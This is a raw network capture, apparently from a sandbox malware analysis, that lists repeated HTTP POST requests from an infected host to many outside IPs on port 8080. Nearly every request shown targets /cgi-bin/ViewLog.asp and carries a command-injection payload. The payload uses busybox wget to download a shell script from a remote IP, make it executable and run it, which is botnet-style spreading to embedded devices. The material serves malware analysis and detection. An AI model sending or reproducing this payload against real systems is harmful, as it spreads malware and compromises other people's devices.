                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:14.644983053 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.370843887 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.514547110 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.609822989 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:30.800719976 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:48.974335909 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:21.737905025 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        896192.168.2.233717094.121.100.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:14.645047903 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.370946884 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.514431953 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.609817982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:30.800704956 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:48.974222898 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:21.737901926 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        897192.168.2.233990462.210.137.2208080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.286544085 CEST326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.580677032 CEST306INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Sun, 14 Apr 2024 14:37:15 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 146
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        898192.168.2.235854831.136.15.1568080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.307037115 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.275036097 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.194560051 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.097907066 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:29.776933908 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:45.134685993 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:15.594667912 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        899192.168.2.233729285.243.234.2028080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.308413982 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:15.625519037 CEST376INHTTP/1.1 404 Not Found
                                                        Date: Sun, 14 Apr 2024 02:55:06 GMT
                                                        Server: DNVRS-Webs
                                                        Cache-Control: no-cache
                                                        Content-Length: 166
                                                        Content-Type: text/html
                                                        Connection: keep-alive
                                                        Keep-Alive: timeout=60, max=99
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        900192.168.2.233750231.136.9.958080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.309921026 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:16.274909973 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:18.194483995 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:22.097889900 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:29.776854038 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:37:45.134681940 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh
                                                        Apr 14, 2024 16:38:17.642467022 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://194.62.248.103/8UsA.sh; chmod +x 8UsA.sh; sh 8UsA.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        901192.168.2.233638694.123.132.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Apr 14, 2024 16:37:15.331712961 CEST314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 34 2e 36 32 2e 32 34 38 2e 31 30 33 2f 38 55 73 41 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 38 55 73 41 2e 73 68 3b 20 73 68 20 38 55 73 41 2e 73 68
